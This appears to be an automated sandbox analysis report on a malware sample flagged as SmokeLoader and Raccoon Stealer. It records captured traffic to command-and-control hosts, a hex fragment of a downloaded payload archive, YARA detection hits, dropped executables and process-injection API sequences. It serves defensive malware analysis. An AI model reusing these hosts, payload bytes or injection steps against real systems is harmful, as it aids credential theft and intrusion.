20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 18:30:47 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rctoc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: hajezey1.top
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.7:49773 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.7:49778 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected SmokeLoader
Source: Yara match File source: 22.2.CD0D.exe.2fb0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.1.irjbuft.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.irjbuft.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.irjbuft.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.CD0D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.6EC5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.irjbuft.2bf15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.6EC5.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.1.25Kf6vSBoq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.25Kf6vSBoq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.1.6EC5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.6EC5.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.6EC5.exe.2c315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.irjbuft.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.3.CD0D.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.irjbuft.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.25Kf6vSBoq.exe.2dc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.6EC5.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000016.00000003.418065622.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.462341902.0000000004791000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.382786562.0000000001F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.296771196.0000000002871000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.461574944.0000000002B80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.312112789.0000000002051000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.447688119.0000000004BA1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.434655880.0000000003000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.382804638.0000000001F91000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.311815156.0000000000420000.00000004.00000001.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: 25Kf6vSBoq.exe, 00000001.00000002.257255262.0000000002E5A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 0000001F.00000002.570848013.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.458016800.0000000004870000.00000004.00000001.sdmp, type: MEMORY

System Summary:

barindex
.NET source code contains very large array initializations
Source: DF9C.exe.4.dr, ??????????????/_?????xptkvqfesn.cs Large array initialization: _?????nacpgkwmie: array initializer size 208904
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E32A9 22_2_6A9E32A9
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9DE2C5 22_2_6A9DE2C5
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4AEF 22_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9CFA2B 22_2_6A9CFA2B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9BEB8A 22_2_6A9BEB8A
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94EBB0 22_2_6A94EBB0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94ABD8 22_2_6A94ABD8
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A968BE8 22_2_6A968BE8
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9C23E3 22_2_6A9C23E3
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93A309 22_2_6A93A309
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93AB40 22_2_6A93AB40
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A92B090 22_2_6A92B090
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A916800 22_2_6A916800
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D1002 22_2_6A9D1002
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93A830 22_2_6A93A830
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A948840 22_2_6A948840
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9399BF 22_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E2EF7 22_2_6A9E2EF7
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D67E2 22_2_6A9D67E2
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A942F70 22_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4496 22_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9435D0 22_2_6A9435D0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A910D20 22_2_6A910D20
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E1D55 22_2_6A9E1D55
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Code function: 28_2_004368D0 28_2_004368D0
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Code function: 28_2_0041EDCE 28_2_0041EDCE
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 29_2_00425150 29_2_00425150
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 29_2_0042419D 29_2_0042419D
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 29_2_0041FAF0 29_2_0041FAF0
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 29_2_00403340 29_2_00403340
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 29_2_00414437 29_2_00414437
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 29_2_00422E27 29_2_00422E27
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 29_2_00422F47 29_2_00422F47
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 29_2_0041FF88 29_2_0041FF88
PE file contains strange resources
Source: CD0D.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CD0D.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CD0D.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CD0D.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CD0D.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CD0D.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CD0D.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: fijbuft.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: fijbuft.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: fijbuft.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: fijbuft.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: fijbuft.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: fijbuft.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: fijbuft.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.20.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.20.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Uses 32bit PE files
Source: 25Kf6vSBoq.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 21.0.C1B2.exe.e80000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.0.EA8A.exe.fa0000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.0.EA8A.exe.fa0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 21.2.C1B2.exe.e80000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 20.0.B82B.exe.850000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 21.0.C1B2.exe.e80000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.0.EA8A.exe.fa0000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.0.EA8A.exe.fa0000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 20.0.B82B.exe.850000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 21.0.C1B2.exe.e80000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 20.0.B82B.exe.850000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 21.0.C1B2.exe.e80000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 20.0.B82B.exe.850000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\C1B2.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\B82B.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Code function: String function: 0041D100 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Code function: String function: 004212E0 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: String function: 00410ED0 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: String function: 0040FB00 appears 101 times
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: String function: 6A96D08C appears 39 times
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: String function: 6A91B150 appears 128 times
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: String function: 6A9A5720 appears 43 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Code function: 2_2_0040185B Sleep,NtTerminateProcess, 2_2_0040185B
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Code function: 2_2_00401866 Sleep,NtTerminateProcess, 2_2_00401866
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Code function: 2_2_0040187A Sleep,NtTerminateProcess, 2_2_0040187A
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Code function: 2_2_0040163B NtMapViewOfSection, 2_2_0040163B
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Code function: 2_2_004018D3 NtTerminateProcess, 2_2_004018D3
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Code function: 2_2_00401884 Sleep,NtTerminateProcess, 2_2_00401884
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Code function: 2_2_00401888 NtTerminateProcess, 2_2_00401888
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Code function: 2_2_0040156A NtMapViewOfSection, 2_2_0040156A
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Code function: 2_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 2_2_004015DB
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Code function: 2_2_004017EA Sleep,NtTerminateProcess, 2_2_004017EA
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Code function: 2_1_0040156A NtMapViewOfSection, 2_1_0040156A
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Code function: 2_1_004015DB NtMapViewOfSection,NtMapViewOfSection, 2_1_004015DB
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Code function: 2_1_0040163B NtMapViewOfSection, 2_1_0040163B
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Code function: 13_2_02C30110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 13_2_02C30110
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Code function: 15_2_0040185B Sleep,NtTerminateProcess, 15_2_0040185B
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Code function: 15_2_00401866 Sleep,NtTerminateProcess, 15_2_00401866
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Code function: 15_2_0040187A Sleep,NtTerminateProcess, 15_2_0040187A
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Code function: 15_2_0040163B NtMapViewOfSection, 15_2_0040163B
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Code function: 15_2_004018D3 NtTerminateProcess, 15_2_004018D3
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Code function: 15_2_00401884 Sleep,NtTerminateProcess, 15_2_00401884
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Code function: 15_2_00401888 NtTerminateProcess, 15_2_00401888
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Code function: 15_2_0040156A NtMapViewOfSection, 15_2_0040156A
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Code function: 15_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 15_2_004015DB
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Code function: 15_2_004017EA Sleep,NtTerminateProcess, 15_2_004017EA
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Code function: 15_1_0040156A NtMapViewOfSection, 15_1_0040156A
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Code function: 15_1_004015DB NtMapViewOfSection,NtMapViewOfSection, 15_1_004015DB
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Code function: 15_1_0040163B NtMapViewOfSection, 15_1_0040163B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_0040181C Sleep,NtTerminateProcess, 22_2_0040181C
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_00402406 NtEnumerateKey, 22_2_00402406
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_00401F25 NtQuerySystemInformation, 22_2_00401F25
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_00401828 Sleep,NtTerminateProcess, 22_2_00401828
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_00402431 NtEnumerateKey, 22_2_00402431
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_004017DA Sleep,NtTerminateProcess, 22_2_004017DA
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_004017F8 NtTerminateProcess, 22_2_004017F8
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_0040209A NtQuerySystemInformation, 22_2_0040209A
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_004017A3 Sleep,NtTerminateProcess, 22_2_004017A3
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9598C0 ZwDuplicateObject,LdrInitializeThunk, 22_2_6A9598C0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959820 ZwEnumerateKey,LdrInitializeThunk, 22_2_6A959820
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959860 ZwQuerySystemInformation,LdrInitializeThunk, 22_2_6A959860
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9599A0 ZwCreateSection,LdrInitializeThunk, 22_2_6A9599A0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959600 ZwOpenKey,LdrInitializeThunk, 22_2_6A959600
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95967A NtQueryInformationProcess,LdrInitializeThunk, 22_2_6A95967A
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959660 ZwAllocateVirtualMemory,LdrInitializeThunk, 22_2_6A959660
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959780 ZwMapViewOfSection,LdrInitializeThunk, 22_2_6A959780
